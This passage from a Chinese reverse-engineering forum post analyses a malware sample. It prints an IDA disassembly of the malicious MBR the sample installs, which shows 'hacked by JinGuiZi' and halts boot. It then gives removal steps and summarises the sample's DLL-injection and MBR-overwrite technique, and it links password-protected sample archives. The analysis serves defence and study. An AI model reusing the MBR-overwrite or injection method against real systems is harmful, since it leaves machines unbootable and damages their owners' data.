此时我们再用winhex到处MBR,IDA静态分析下,详细的MBR学习请转帖到willJ大大的MBR学习哦
;org 7C00h
seg000:7C00 assume es:nothing, ss:nothing, ds:nothing, fs:nothing, gs:nothing
seg000:7C00 B8 12 00 mov ax, 12h ; 设置显示器模式,12H:640×480 16色
seg000:7C03 CD 10 int 10h ; - VIDEO - SET VIDEO MODE
seg000:7C03 ; AL = mode
seg000:7C05 BD 18 7C mov bp, 7C18h ; es:bp字符串的地址
seg000:7C08 B9 13 00 mov cx, 13h ; 显示字符串长度为0x13
seg000:7C0B B8 01 13 mov ax, 1301h ; ah = 13h,al = 01h 表示执行int10中断的13号程序功能(在Teletype模式下显示字符串)
seg000:7C0E BB 0C 00 mov bx, 0Ch ; bl=0Ch,表示属性,背景色为黑色,字体颜色为淡红色
seg000:7C11 BA 00 00 mov dx, 0 ; dh = 0;表示第0列第0行
seg000:7C14 CD 10 int 10h ; - VIDEO - WRITE STRING (AT,XT286,PS,EGA,VGA)
seg000:7C14 ; AL = mode, BL = attribute if AL bit 1 clear, BH = display page number
seg000:7C14 ; DH,DL = row,column of starting cursor position, CX = length of string
seg000:7C14 ; ES:BP -> start of string
seg000:7C14 ; ---------------------------------------------------------------------------
seg000:7C16 E2 FE loop loc_7C16 ; 死循环
seg000:7C16 ; ---------------------------------------------------------------------------
seg000:7C18 68 61 63 6B 65 64 20 62+aHackedByJingui db 'hacked by JinGuiZi ' ; 要显示的字符串
MBR最后两位0x55,0xAA
seg000:7DFE 55 db 55h ; U
seg000:7DFF AA db 0AAh ;
最后看下效果
效果
预防和修复
MBR恢复可以看下http://www.52pojie.cn/thread-188123-1-1.htmlwillJ大大的这个帖子
删除系统目下的GuiZi.exe以及windows目录下的rand().dll
注册表进行恢复
附件:
一个简单的恶意代码分析.doc
(181.5 KB, 下载次数: 37)
OhMyGod.7z
(54.78 KB, 下载次数: 68)
密码 "52pojie"
MBR_Jin.7z
(187 Bytes, 下载次数: 37)
PS:XP成功,win7完蛋。
总结:此样本的方法就是创建一个dll,去注入桌面这个万能的进程,当我们操作桌面的时候,就成功加载这个dll,就对MBR进行写入,然后动态获取MessageBoxA的地址用的shellcode的方式(读取输入表),获取,比较隐秘,不过对于动态调试就无力了,是一种hook API的方法,也学习了一种方法,很不错。其他的应该都是干扰信息,我们不用理会。
|
免费评分
-
查看全部评分
|
[复制链接]
发表于 2013-7-11 11:31
|
发表于 2013-7-11 20:55
